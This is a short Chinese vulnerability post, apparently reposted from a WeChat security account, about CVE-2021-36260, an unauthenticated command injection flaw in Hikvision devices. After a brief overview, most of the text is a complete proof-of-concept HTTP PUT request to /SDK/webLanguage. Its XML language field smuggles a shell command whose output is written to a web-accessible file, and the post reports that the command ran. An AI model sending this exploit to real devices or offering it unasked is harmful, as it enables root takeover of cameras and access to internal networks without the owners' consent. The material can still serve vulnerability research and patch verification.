0x00 漏洞概述
漏洞编号:CVE-2021-36260
细节:海康威视部分产品中的web模块存在一个命令注入漏洞,由于对输入参数校验不充分,攻击者利用该漏洞可以用无限制的root shell来完全控制设备,即使设备的所有者受限于有限的受保护shell(psh)。除了入侵IP摄像头外,还可以访问和攻击内部网络。该漏洞的利用并不需要用户交互,攻击者只需要访问httpHTTPS服务器端口(80/443)即可利用该漏洞,无需用户名、密码、以及其他操作。摄像头本身也不会检测到任何登录信息。
海康威视已发布版本修复该漏洞。
0x01 正文
海康威视登录页面
漏洞PoC:
PUT /SDK/webLanguage HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: language=zh
Upgrade-Insecure-Requests: 1
Content-Length: 102
<language>
$(ifconfig -a > webLib/x.asp)
</language>
成功执行命令:
– End –
原文始发于微信公众号(NS Demon团队):海康威视代码执行漏洞